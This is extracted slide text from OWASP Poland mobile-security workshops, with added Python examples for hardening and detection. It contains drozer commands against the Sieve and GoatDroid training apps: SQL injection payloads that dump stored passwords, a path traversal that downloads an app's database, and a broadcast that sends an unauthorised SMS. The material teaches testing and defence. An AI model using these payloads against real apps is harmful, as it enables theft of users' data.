bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
References
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risks
• https://github.com/ikust/hello-pinnedcerts
• http://www.exploresecurity.com/testing-for-cipher-suite-preference/
• http://resources.infosecinstitute.com/android-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakage/
• http://www.slideshare.net/JackMannino/owasp-top-10-mobile-risks
• https://manifestsecurity.com/android-application-security/
• https://mobilesecuritywiki.com/
• http://androidcracking.blogspot.de/2014/02/zerdeis-luyten-worthwhile-jd-gui.html
• https://www.acsac.org/2011/openconf/modules/request.php?module=oc_program&action=view.php&a=&id=111&type=3&OPENCONF=54jm3hh7laelc19qq6ernql5m2
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Mobile_Threat_Model
• https://www.owasp.org/index.php/Projects/OWASP_Mobile_Security_Project_-_Security_Testing
• https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
• https://www.ssllabs.com/ssltest/
• http://www.slideshare.net/ibmsecurity/overtaking-firefox-profiles-vulnerabilities-in-firefox-for-android
• http://resources.infosecinstitute.com/cracking-nq-vault-step-by-step/
• http://www.slideshare.net/ibmsecurity/pinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystack
• https://github.com/linkedin/qark
• https://www.mendeley.com/catalog/falling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage/
• http://blog.quarkslab.com/abusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerability.html
• http://www.bkav.com/top-news/-/view_content/content/46264/critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screen
• http://thehackernews.com/2014/05/microsoft-outlook-app-for-android.html
• https://drive.google.com/file/d/0BxOPagp1jPHWVnlzWGNVbFBMTW8/view?pref=2&pli=1
Reverse Engineering & Malware Analysis
Daniel Ramirez, OWASP Poland, 24.02.2016
Anatomy of an apk
Getting our apk file
• From the phone
– APKOptic
– Astro File Manager
• Using ADB
• Use APKpure
Decompiling || Disassembling
• Decompiling – High Level – Java Code
• Disassembling – Low Level – Assembly Code
• Why Disassembling and not Decompiling?
Decompiling
DEX → JAR → JAVA
Decompiling - Dex2Jar
• dex2jar
– Converts Dalvik bytecode (DEX) to Java bytecode (JAR)
– Allows you to use any existing Java decompiler with the resulting JAR file
Decompiling – Java Decompilers
• JD-GUI || Luyten
– Closed source Java decompiler
– Combined with dex2jar you can use JD-GUI or Luyten to decompile Android applications
• Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX → SMALI
Disassembling
• Apktool
– Open source Java tool for reverse-engineering Android apps
– Transforms binary Dalvik byte code (dex) into Smali source
Signing apk
• Using signapk.jar:
  java -jar signapk.jar certificate.pem key.pk8 your-app.apk your-app-signed.apk
• Using AppUse
Demo Time
Demo: Decompiling (Luyten)
Demo: Modify Smali Files
Demo
Android 6.0
• Runtime Permissions
• Verified Boot
• Hardware-Isolated Security
• Fingerprints
• SD Card Adoption
• Clear Text Traffic
• System Hardening
• USB Access Control
Defense layers
Google Play:
1. Require and validate developer information
2. Review applications before distribution
3. Permanently stop distribution
4. Reduce attacker flexibility
5. Remove applications after installation
Apps from Unknown Sources
By default only Google Play and other pre-installed app stores are allowed to install apps. The vast majority of installs come from Google Play.
Verify Apps
Apps are verified prior to install. Warn for or block Potentially Harmful Applications. Over 10 million installs verified every day. Verifying is on and visible when needed.
Core security features to build a secure application
• The Android Application Sandbox
• An application framework with robust implementations of common security functionality such as cryptography, permissions
• An encrypted file system that can be enabled to protect data on lost or stolen devices
• User-granted permissions to restrict access to system features and user data
• Application-defined permissions to control application data on a per-app basis
Thank you
Any questions?
Application Components Security
Alexander Antukh, OWASP Poland, 24.02.2016
Android Application Security
Often the app contains some sensitive data:
• Passwords
• Authentication tokens
• Contacts
• Communication records
• IP addresses or domain names of sensitive services
Android Application Security
Global problems in securing the applications:
• How sensitive data is stored
– Isolation
– Privilege separation
• How sensitive data is transmitted
– Extra-device communication
– Inter-application communication
– Inter-component communication
Android Application Components
Activities, Services, Content providers, Broadcast receivers
Android Application Components
AndroidManifest.xml defines in which way the app works and what kind of interaction between components and the outer world is possible. Permissions are set there too.
• Activities – <activity>
• Services – <service>
• Content providers – <provider>
• Broadcast receivers – <receiver>
Android Manifest
Sample manifest file. Note the following:
• Permissions
  <uses-permission android:name="string" />
  <permission android:protectionLevel="…" />
• Components and their attributes
AndroidManifest.xml
Android Manifest
Protection levels:
• dangerous – increased risk (directly affects users)
• normal – minimal risk (default value)
• signature – same certificate
• signatureOrSystem – same certificate || app in the Android system image
Android Manifest
• debuggable
• enabled
• exported
• permission
Activities, Services, Content providers, Broadcast receivers
Example components attributes
Intents
An intent is a defined object used for messaging that is created and communicated to an intended application component. It includes all relevant information about the calling application, the desired application component and the requested actions/data.
  Intent intent = new Intent(Intent.ACTION_VIEW);
  intent.setData(Uri.parse("http://www.google.com"));
  String pack = "com.android.browser";
  ComponentName comp = new ComponentName(pack, pack + ".BrowserActivity");
  intent.setComponent(comp);
  startActivity(intent);
Drozer
Open source tool to interact with other applications through IPC - the leading security assessment framework for Android
Manual on installation and usage
Drozer
The best thing about Drozer: you don't need to write your own apps to interact with other apps :)
dz> run app.activity.start --action android.intent.action.VIEW --data-uri http://www.google.com --component com.android.browser com.android.browser.BrowserActivity
Drozer
Is installed in the default package of AppUse together with adb, so it's enough to just "click-and-play"
Activity components
An Activity provides a screen with which users can interact in order to do something. Users can perform operations such as making a call, sending an SMS, etc.
Example: login screen of your Facebook app
Activities
Activity components attacks
• If an activity can be triggered by other apps (by an attacker), it can be abused
• Launching by intents, it's possible to achieve the following:
– Modify data in background
– Tricking the user
– Leaking sensitive information
Activity components attacks
• General hijacking scheme (diagram: A, B, E)
• Results of an attack:
– Malicious Activity could read the data in the Intent and then immediately relay it to a legitimate one
– Spoofing the expected Activity's user interface to steal user-supplied data (phishing)
Activity components attacks
• List and launch exported activities
dz> run app.activity.info -a com.mwr.example.sieve
Package: com.mwr.example.sieve
  com.mwr.example.sieve.FileSelectActivity
  com.mwr.example.sieve.MainLoginActivity
  com.mwr.example.sieve.PWList
dz> run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList
Activity components demo
Services
A Service can perform long-running operations in the background and does not provide a user interface. Other components can bind to a Service, which lets the binder invoke methods that are declared in the target Service's interface. Intents are used to start and bind to Services.
Example: playing music or downloading a file
Services attacks
Although generally they don't seem dangerous, they could potentially perform sensitive operations.
To attack a service one needs interaction (it must be exported, or respond to/accept input from message formats like intents, files or the network stack).
Services attacks
Typical attacks: Denial of Service and Information Leakage
• Find exported services
• Launch them one-by-one with logcat to check for sensitive info
• Fire off intents and wait for it
Content providers
A content provider presents data to external applications as one or more tables. In other words, content providers can be treated as interfaces that connect data in one process with code running in another process.
Example: using content providers, any app can read SMS from the inbuilt SMS app's repository on our device
Content providers
• What info can they hold?
– User's phone numbers
– Passwords
– SMS
• And one of the main problems is, again, permissions
run app.provider.info --permission null
Content providers attacks
• Unrestricted access to app database
– Just query it – run app.provider.query content://settings/secure
• SQL injection
• Path traversal
Other attack vectors on auth might include altering data, e.g. by using the app.provider.insert command
dz> run scanner.provider.injection -a com.mwr.example.sieve
Content providers attacks
• Unrestricted access to app database
dz> run scanner.provider.finduris -a com.mwr.example.sieve
Accessible content URIs:
  content://com.mwr.example.sieve.DBContentProvider/Keys
  content://com.mwr.example.sieve.DBContentProvider/Passwords
  content://com.mwr.example.sieve.DBContentProvider/Passwords/
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --vertical
Content providers attacks
• SQL injection
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
unrecognized token: "')" (code 1): , while compiling: SELECT * FROM Passwords WHERE (')
dz> run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"
| Password         | pin  |
| thisismypassword | 9876 |
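Why the `--selection` and `--projection` payloads above work, and what the provider should have done instead, as an added example that is neither drozer code nor the Sieve app: a tiny sqlite-backed stand-in for a ContentProvider's `query()`, built once the vulnerable way (caller-controlled projection and selection concatenated into the SQL text) and once hardened (projection checked against a column whitelist, selection restricted to `column op ?` clauses with every value bound as a parameter). Table and column names follow the slide; the row contents and function names are constructed for the example.

```python
import re
import sqlite3


def make_db():
    """Constructed stand-in for the app's database: a Passwords table and a Key table."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE Passwords (service TEXT, username TEXT, password TEXT)")
    db.execute("CREATE TABLE Key (Password TEXT, pin TEXT)")
    db.execute("INSERT INTO Passwords VALUES ('mail', 'alice', 'hunter2')")
    db.execute("INSERT INTO Key VALUES ('thisismypassword', '9876')")
    return db


def vulnerable_query(db, projection, selection, selection_args=()):
    """Mirrors a provider that pastes the caller's projection and selection into SQL."""
    cols = ", ".join(projection) if projection else "*"
    sql = f"SELECT {cols} FROM Passwords"
    if selection:
        sql += f" WHERE ({selection})"
    return db.execute(sql, selection_args).fetchall()


ALLOWED_COLUMNS = {"service", "username", "password"}
# One comparison of a known column against a bound '?' placeholder.
_CLAUSE = re.compile(r"^\s*(\w+)\s*(?:=|<>|<|>|LIKE)\s*\?\s*$", re.I)


def _validate_selection(selection):
    for clause in re.split(r"\s+(?:AND|OR)\s+", selection, flags=re.I):
        m = _CLAUSE.match(clause)
        if not m or m.group(1) not in ALLOWED_COLUMNS:
            raise ValueError(f"rejected selection clause: {clause!r}")


def hardened_query(db, projection, selection, selection_args=()):
    """Same interface as vulnerable_query, but SQL text never comes from the caller:
    only whitelisted column names and '?' placeholders reach the statement."""
    projection = list(projection) if projection else sorted(ALLOWED_COLUMNS)
    bad = [c for c in projection if c not in ALLOWED_COLUMNS]
    if bad:
        raise ValueError(f"unknown column(s) in projection: {bad}")
    sql = f"SELECT {', '.join(projection)} FROM Passwords"
    if selection:
        _validate_selection(selection)
        sql += f" WHERE ({selection})"
    return db.execute(sql, selection_args).fetchall()


def injection_error(db):
    """Reproduce the drozer symptom: a lone quote in --selection breaks the statement."""
    try:
        vulnerable_query(db, None, "'")
    except sqlite3.OperationalError as e:
        return str(e)
    return None


def projection_injection(db):
    """Reproduce --projection "* FROM Key;--": the Key table leaks through the Passwords URI."""
    return vulnerable_query(db, ["* FROM Key;--"], None)


def hardened_rejects(db, projection, selection, selection_args=()):
    """True when the hardened query refuses the input (the desired outcome for payloads)."""
    try:
        hardened_query(db, projection, selection, selection_args)
    except ValueError:
        return True
    return False
```

The hardened version still supports legitimate callers (`hardened_query(db, None, "service = ?", ("mail",))`), which is the point: the fix is not to forbid selections but to stop treating caller input as SQL.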
Content providers attacks
• Path traversal
One interesting real-life example: http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application/
dz> run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
127.0.0.1 localhost
dz> run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data/data/com.mwr.example.sieve/databases/database.db /home/user/database.db
Written 24576 bytes
Content providers demo
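The check a file-serving provider such as the FileBackupProvider above is missing, as an added example (not from the slides or from the Sieve app): the URI path is joined to the provider's root, canonicalised, and refused unless the result is still inside that root. The `BackupFileProvider` class, its root directory and the files in it are constructed for this example; the comparison is done on canonical paths so `..` segments and symlinks cannot step outside.

```python
import os
import tempfile


class BackupFileProvider:
    """Serves files strictly below `root`, the way a backup provider should."""

    def __init__(self, root):
        self.root = os.path.realpath(root)

    def resolve(self, uri_path):
        """Map the path part of content://<authority>/<uri_path> to a real file.
        Returns None when the request would leave the root."""
        # Strip the leading '/', then collapse '..' segments and resolve symlinks.
        candidate = os.path.realpath(os.path.join(self.root, uri_path.lstrip("/")))
        # Compare with the separator appended so /backup-evil does not count as under /backup.
        if candidate != self.root and not candidate.startswith(self.root + os.sep):
            return None
        return candidate

    def read(self, uri_path):
        target = self.resolve(uri_path)
        if target is None:
            raise PermissionError(f"path escapes provider root: {uri_path}")
        with open(target, "rb") as fh:
            return fh.read()


def vulnerable_resolve(root, uri_path):
    """The pattern behind the slide's /etc/hosts read: root + path, no canonical check."""
    return os.path.join(root, uri_path.lstrip("/"))   # '..' segments pass straight through


def demo():
    """Build a constructed layout and exercise both resolvers; returns the outcomes."""
    base = tempfile.mkdtemp()
    root = os.path.join(base, "backup")
    os.makedirs(root)
    with open(os.path.join(root, "notes.txt"), "wb") as fh:
        fh.write(b"backup contents")
    with open(os.path.join(base, "secret.db"), "wb") as fh:   # lives outside the root
        fh.write(b"database contents")
    provider = BackupFileProvider(root)
    return {
        "in_root": provider.read("/notes.txt"),
        "escape_blocked": provider.resolve("/../secret.db") is None,
        "nested_escape_blocked": provider.resolve("/a/../../secret.db") is None,
        # An absolute-looking path is confined to the root rather than read from the filesystem root.
        "absolute_confined": provider.resolve("/etc/hosts") == os.path.join(provider.root, "etc", "hosts"),
        "vulnerable_escapes": os.path.exists(vulnerable_resolve(root, "/../secret.db")),
    }
```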
Broadcast receivers
A broadcast receiver is a component that responds to system-wide broadcast announcements such as Battery Low, boot completed, headset plug, etc. Though most of the broadcasts originate from the system, applications can also announce broadcasts.
Broadcast receivers
• If a receiver accepts broadcasts from untrusted sources, the app is at risk
Broadcast receivers attacks
Typical fail: authorization
• Enumerate receivers
• Determine how the receiver handles the action
• Send intent and enjoy
Broadcast receivers attacks
  <receiver android:name=".broadcastreceivers.SendSMSNowReceiver" android:label="Send SMS">
    <intent-filter>
      <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
    </intent-filter>
  </receiver>
  …
  <uses-permission android:name="android.permission.SEND_SMS" />
Sample manifest from GoatDroid
Broadcast receivers attacks
  public void onReceive(Context arg0, Intent arg1) {
      context = arg0;
      SmsManager sms = SmsManager.getDefault();
      Bundle bundle = arg1.getExtras();
      sms.sendTextMessage(bundle.getString("phoneNumber"), null, bundle.getString("message"), null, null);
      Utils.makeToast(context, Constants.TEXT_MESSAGE_SENT, Toast.LENGTH_LONG);
  }
The above is the code that determines how the receiver handles the org.owasp.goatdroid.fourgoats.SOCIAL_SMS action.
Broadcast receivers attacks
run app.broadcast.send --action org.owasp.goatdroid.fourgoats.SOCIAL_SMS --component org.owasp.goatdroid.fourgoats org.owasp.goatdroid.fourgoats.broadcastreceivers.SendSMSNowReceiver --extra string phoneNumber 1234567890 --extra string message PWNED
General defenses for App Components
Applies to all abovementioned items:
• Setting the android:exported attribute to false (only the same user ID as the current app will be able to access the activity)
• Limiting access with custom permissions for an activity (RECEIVE_SMS and others)
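The "enumerate exported components" step that the activity, service and receiver slides each perform with drozer, and the two defenses just listed, turned into a static check over the manifest. This is an added example, not drozer and not GoatDroid code: it parses an AndroidManifest.xml and reports every component other apps can reach that has no protecting permission, applying the platform rule that an explicit `android:exported` wins, a component with an `<intent-filter>` is otherwise exported, and a `<provider>` is exported unless it says otherwise (the pre-API-17 default this check assumes). The sample manifest is constructed around the GoatDroid receiver shown above; the other components and the custom permission in it are invented.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
COMPONENTS = ("activity", "service", "receiver", "provider")

# Constructed sample manifest: the receiver from the GoatDroid slide, plus an
# unprotected provider, a properly locked-down service and a non-exported activity.
SAMPLE_MANIFEST = """\
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="org.owasp.goatdroid.fourgoats">
  <uses-permission android:name="android.permission.SEND_SMS" />
  <permission android:name="org.owasp.goatdroid.fourgoats.INTERNAL"
              android:protectionLevel="signature" />
  <application>
    <receiver android:name=".broadcastreceivers.SendSMSNowReceiver" android:label="Send SMS">
      <intent-filter>
        <action android:name="org.owasp.goatdroid.fourgoats.SOCIAL_SMS" />
      </intent-filter>
    </receiver>
    <provider android:name=".ExampleProvider"
              android:authorities="org.owasp.goatdroid.fourgoats.example" />
    <service android:name=".SyncService"
             android:exported="true"
             android:permission="org.owasp.goatdroid.fourgoats.INTERNAL" />
    <activity android:name=".MainActivity" android:exported="false" />
  </application>
</manifest>
"""


def _attr(elem, name):
    return elem.get(f"{{{ANDROID_NS}}}{name}")


def is_exported(elem):
    """Explicit android:exported wins; otherwise an intent-filter exports the
    component, and a provider is exported by default (assumption: old minSdk)."""
    explicit = _attr(elem, "exported")
    if explicit is not None:
        return explicit.lower() == "true"
    if elem.tag == "provider":
        return True
    return elem.find("intent-filter") is not None


def audit_manifest(xml_text):
    """Return [(tag, name, reason)] for components reachable by any app without a permission."""
    root = ET.fromstring(xml_text)
    app = root.find("application")
    findings = []
    for elem in (app if app is not None else []):
        if elem.tag not in COMPONENTS or not is_exported(elem):
            continue
        perm = _attr(elem, "permission")
        if elem.tag == "provider":
            perm = perm or _attr(elem, "readPermission") or _attr(elem, "writePermission")
        if perm is None:
            implicit = _attr(elem, "exported") is None and elem.tag != "provider"
            reason = ("implicitly exported by intent-filter" if implicit
                      else "exported without android:permission")
            findings.append((elem.tag, _attr(elem, "name"), reason))
    return findings
```

Run against a real manifest decoded with apktool, each finding is a component to either mark `android:exported="false"` or guard with an `android:permission`, which is what the GoatDroid receiver above lacks.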
References
• http://developer.android.com/guide/components/index.html
• http://developer.android.com/guide/topics/manifest/manifest-intro.html
• http://resources.infosecinstitute.com/android-hacking-security-part-1-exploiting-securing-application-components/
• http://resources.infosecinstitute.com/android-hacking-security-part-2-content-provider-leakage/
• http://resources.infosecinstitute.com/android-hacking-security-part-3-exploiting-broadcast-receivers/
• http://yinzhicao.org/courses/f15/cse343443/slides/mobilesecurity.pdf
• https://www.safaribooksonline.com/library/view/android-security-cookbook/
• https://www.mwrinfosecurity.com/system/assets/937/original/mwri_drozer-user-guide_2015-03-23.pdf
• https://manifestsecurity.com/android-application-security-part-5/
• https://manifestsecurity.com/android-application-security-part-8/
• https://www.eecs.berkeley.edu/~daw/papers/intents-mobisys11.pdf
• http://blog.seguesec.com/2012/09/path-traversal-vulnerability-on-shazam-android-application/
• https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet#android-application-penetration-testing
Thank you
• For additional questions or just to stay in touch: c0rdis
OWASP top 10 mobile risks
Pawel Rzepa, OWASP Poland, 24.02.2016
Important notes
• The goal of this presentation is to provide you with basic knowledge about mobile risks and an easy methodology to find those risks in your applications
• If you want to add anything important/interesting and related to the topic – feel free to interrupt me :)
What are we going to talk about…
Before we start… the threat model
M2 - Insecure data storage
Insecure data storage – what it is
• Simple words definition: valuable pieces of data (e.g. passwords, cookies, personal information) are stored in the data stores on the device in an insecure (plain text or reversible encoding) format
Insecure data storage – what to look for
• Look for any sensitive information in:
– SQLite databases (local)
– XML Data Stores
– Plain text configuration files
– Cookie stores
– SD Card
Insecure data storage – how to find
• Install and run the application for some time
• Monitor changes on the sdcard before and after installing an application
• Analyze package files at different stages:
adb pull /data/data/<apk_package_name>
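The "monitor changes before and after" and "analyze package files" steps above, automated as an added example that is not part of the workshop: snapshot a directory tree (the sdcard, or a package directory pulled with `adb pull`), diff it against a later snapshot to see what the app wrote, then scan the SharedPreferences XML for entries whose name looks like a secret and check whether the file is world-readable. The directory layout, file names and values below are constructed in a temporary folder; the key-name pattern is an assumption to tune per app.

```python
import hashlib
import os
import re
import tempfile
import xml.etree.ElementTree as ET

# Assumption: preference names that usually hold something worth protecting.
SUSPICIOUS_KEY = re.compile(r"pass(word|wd)?|secret|token|api[_-]?key|session|pin", re.I)


def snapshot(root):
    """Map relative path -> sha256 of content for every regular file under root."""
    result = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            result[os.path.relpath(full, root)] = digest
    return result


def diff_snapshots(before, after):
    """Files the app created or modified between the two snapshots."""
    added = sorted(p for p in after if p not in before)
    changed = sorted(p for p in after if p in before and after[p] != before[p])
    return {"added": added, "changed": changed}


def scan_shared_prefs(xml_path):
    """Flag entries in a SharedPreferences XML whose name looks like a secret;
    returns [(name, value)] with the value as stored, i.e. in plain text."""
    hits = []
    for entry in ET.parse(xml_path).getroot():
        name = entry.get("name", "")
        if SUSPICIOUS_KEY.search(name):
            value = entry.text if entry.text is not None else entry.get("value", "")
            hits.append((name, value))
    return hits


def world_readable(path):
    """True when the 'other' read bit is set (what MODE_WORLD_READABLE produces)."""
    return bool(os.stat(path).st_mode & 0o004)


def demo():
    """Constructed /data/data/<package> tree: 'before' snapshot, simulate the app
    writing files, 'after' snapshot, then the scans."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "shared_prefs"))
    os.makedirs(os.path.join(root, "databases"))
    with open(os.path.join(root, "databases", "app.db"), "wb") as fh:
        fh.write(b"SQLite format 3\x00")
    before = snapshot(root)

    prefs = os.path.join(root, "shared_prefs", "com.example.app_preferences.xml")
    with open(prefs, "w") as fh:
        fh.write('<?xml version="1.0" encoding="utf-8" standalone="yes" ?>\n<map>\n'
                 '  <string name="username">alice</string>\n'
                 '  <string name="password">hunter2</string>\n'
                 '  <string name="auth_token">eyJabc.constructed.token</string>\n'
                 '  <int name="launch_count" value="3" />\n</map>\n')
    os.chmod(prefs, 0o644)          # world-readable, as MODE_WORLD_READABLE would leave it
    with open(os.path.join(root, "databases", "app.db"), "ab") as fh:
        fh.write(b"more rows")
    after = snapshot(root)

    return {
        "diff": diff_snapshots(before, after),
        "secrets": scan_shared_prefs(prefs),
        "prefs_world_readable": world_readable(prefs),
    }
```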
Insecure data storage - demo
Insecure data storage – real example
• Outlook stored all attachments as unencrypted and world-readable files on external storage
Insecure data storage - mitigations
• Don't store data unless it's absolutely necessary
• Use encryption for local storage (use the method setStorageEncryption)
• For databases consider using SQLCipher for SQLite data encryption
• Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection – what it is
• Simple words definition: the application does NOT implement TLS, or it does so incorrectly
What do you mean "incorrectly"?
• Insecure implementations are:
– Using known weak cipher/protocol versions (e.g. SSLv2/SSLv3, RC4)
– Securing only part of the communication (e.g. only authentication)
– Lack of certificate inspection
Certificate inspection in web applications – chain of trust
• In web applications the validation of the certificate is on the side of the browser
• It is done by a "chain of trust"
• But how can a mobile app know if it is communicating with the proper server?
Cert Pinning - theory
• Embedded in the source code: the expected X.509 certificate or public key
  if (presented_cert == pinned_cert)
      Start_connection()
  else
      Drop_connection()
Cert Pinning - reality
• Guys from Leibniz Universität Hannover tested 100 apps and…
• 21 apps trust all certificates
• 20 apps accept all hostnames
• And in the end they asked developers why it happened…
More: https://www.owasp.org/images/7/77/Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl%2BMarian_Harbach%2BMathew_Smith.pdf
Insufficient transport layer protection - how to find
• Passive analysis with Wireshark/Burp (to check if all traffic is encrypted)
• Use Mallodroid:
  mallodroid.py -f AppToCheck.apk -d javaout
• Look for end point implementation flaws using SSLyze (or https://www.ssllabs.com/ssltest/ for a public domain)
  sslyze --regular www.example.com:443
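What a Mallodroid-style pass over decompiled source actually looks for, as an added example (this is not Mallodroid and not workshop code): after dex2jar and a decompiler have produced Java, scan it for the two failure classes the Hannover study counted, trust-all TrustManagers and accept-all HostnameVerifiers, plus weak protocol and RC4 cipher selection. The Java snippets are constructed decompiler output; the class names in them are invented, and the patterns are deliberately simple string rules, so a real scan should treat a hit as a place to read, not a verdict.

```python
import re

# Each rule: (finding label, compiled regex). re.S lets a method body span lines.
RULES = [
    ("trust-all TrustManager: empty checkServerTrusted",
     re.compile(r"checkServerTrusted\s*\([^)]*\)\s*(throws\s+[\w.]+\s*)?\{\s*\}", re.S)),
    ("accept-all HostnameVerifier: verify() returns true",
     re.compile(r"boolean\s+verify\s*\([^)]*\)\s*\{\s*return\s+true\s*;\s*\}", re.S)),
    ("accept-all HostnameVerifier: ALLOW_ALL_HOSTNAME_VERIFIER",
     re.compile(r"ALLOW_ALL_HOSTNAME_VERIFIER")),
    ("weak protocol requested",
     re.compile(r"SSLContext\.getInstance\s*\(\s*\"(SSLv3|SSLv2|SSL)\"\s*\)")),
    ("RC4 cipher suite enabled",
     re.compile(r"\"[A-Z0-9_]*RC4[A-Z0-9_]*\"")),
]


def scan_java(source):
    """Return the list of (label, line number) findings for one Java source file,
    ordered by line so the reviewer can walk the file top to bottom."""
    findings = []
    for label, pattern in RULES:
        for m in pattern.finditer(source):
            line = source.count("\n", 0, m.start()) + 1
            findings.append((label, line))
    return sorted(findings, key=lambda f: f[1])


# Constructed decompiler output showing the anti-patterns.
BROKEN_SOURCE = """\
public class NaiveTrust implements X509TrustManager {
    public void checkClientTrusted(X509Certificate[] chain, String authType) { }
    public void checkServerTrusted(X509Certificate[] chain, String authType) throws CertificateException { }
    public X509Certificate[] getAcceptedIssuers() { return null; }
}
class AnyHost implements HostnameVerifier {
    public boolean verify(String hostname, SSLSession session) { return true; }
}
class Net {
    void open() throws Exception {
        SSLContext ctx = SSLContext.getInstance("SSLv3");
        socket.setEnabledCipherSuites(new String[] { "SSL_RSA_WITH_RC4_128_SHA" });
    }
}
"""

# Constructed output for a client that leaves validation to the platform defaults.
SOUND_SOURCE = """\
class Net {
    void open() throws Exception {
        SSLContext ctx = SSLContext.getInstance("TLSv1.2");
        ctx.init(null, null, null);   // default TrustManager, default HostnameVerifier
    }
}
"""
```

The two `checkServerTrusted` and `verify` hits are the code shapes behind "trust all certificates" and "accept all hostnames" in the numbers quoted above: with either present, an interception proxy with any certificate will be accepted.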
Insufficient transport layer protection - example
Insufficient transport layer protection - few facts from reality
• According to the FireEye research from July 17, 2014 among the 1000 most-downloaded free applications in the Google Play store: (chart)
Source: https://www.fireeye.com/blog/threat-research/2014/08/ssl-vulnerabilities-who-listens-when-android-applications-talk.html
Insufficient transport layer protection - mitigations
• Any sensitive data MUST be transferred over TLS
• How to do it properly? Follow the rules: https://www.owasp.org/index.php/Transport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage – what it is
• Simple words definition: the OS/frameworks put sensitive information in an insecure location on the device
• Important note: insecure data storage talks about the developer's conscious efforts to store data in an insecure manner, while unintended data leakage refers to OS/framework-specific quirks which can cause data leakages
Unintended data leakage – common leakage points
• URL Caching
• Copy/Paste buffer Caching
• Logging
• Analytics data sent to 3rd parties (e.g. ads sending GPS location)
Unintended data leakage – how to find
• Extract data from leaking content providers using Drozer:
dz> run app.provider.finduri <package_name>
• Use logcat to verify what is being logged, using ADB:
adb logcat [output filter]
• Use a listener (Burp/Wireshark) to monitor what is being sent to 3rd parties
• Use Intent Sniffer to see if any confidential data is sent via Intents
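The "use logcat to verify what is being logged" step as detection logic, an added example that is not part of the workshop: parse `adb logcat` lines in the brief format, keep those with the tags of the app under test, and match each message against the data classes a debug statement or crash log should never contain (credentials, session tokens and JWTs, e-mail addresses, GPS coordinates). The logcat excerpt is constructed; the tags, PIDs and values in it are invented, and the patterns are assumptions to extend per application.

```python
import re

# logcat 'brief' format: L/Tag( PID): message
LOGCAT_LINE = re.compile(
    r"^(?P<level>[VDIWEF])/(?P<tag>[^(]+)\(\s*(?P<pid>\d+)\):\s*(?P<msg>.*)$")

LEAK_PATTERNS = {
    "credential": re.compile(r"\b(password|passwd|pwd|pin)\s*[=:]\s*\S+", re.I),
    "session token": re.compile(r"\b(token|session[_ ]?id|authorization)\s*[=:]\s*\S+", re.I),
    "jwt": re.compile(r"\beyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+"),
    "email": re.compile(r"[\w.+-]+@[\w-]+\.[\w.-]+"),
    "gps coordinate": re.compile(r"-?\d{1,2}\.\d{4,},\s*-?\d{1,3}\.\d{4,}"),
}


def parse_logcat(text):
    """Yield (tag, pid, msg) for each well-formed line; anything else is skipped."""
    for line in text.splitlines():
        m = LOGCAT_LINE.match(line)
        if m:
            yield m.group("tag").strip(), int(m.group("pid")), m.group("msg")


def find_leaks(text, app_tags=None):
    """Return [(tag, category, matched text)] for messages that leak data.
    With app_tags given, only those tags (the app under test) are inspected."""
    leaks = []
    for tag, _pid, msg in parse_logcat(text):
        if app_tags is not None and tag not in app_tags:
            continue
        for category, pattern in LEAK_PATTERNS.items():
            m = pattern.search(msg)
            if m:
                leaks.append((tag, category, m.group(0)))
    return leaks


# Constructed logcat excerpt from a hypothetical app tagged "ShopApp".
SAMPLE_LOGCAT = """\
D/ShopApp ( 1234): login request user=alice@example.com password=hunter2
I/ShopApp ( 1234): HTTP 200 /api/login
D/ShopApp ( 1234): session stored: token=eyJhbGciOi.eyJzdWIiOiJh.c2lnbmF0dXJl
D/Analytics( 1234): event=open location=52.2297,21.0122
W/ActivityManager(  812): Displayed com.example.shop/.MainActivity: +412ms
"""
```

Because any app on the device with READ_LOGS (on older Android versions) or anyone with adb access can read the same buffer, every hit here is a candidate for the "NEVER log any sensitive information" mitigation below.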
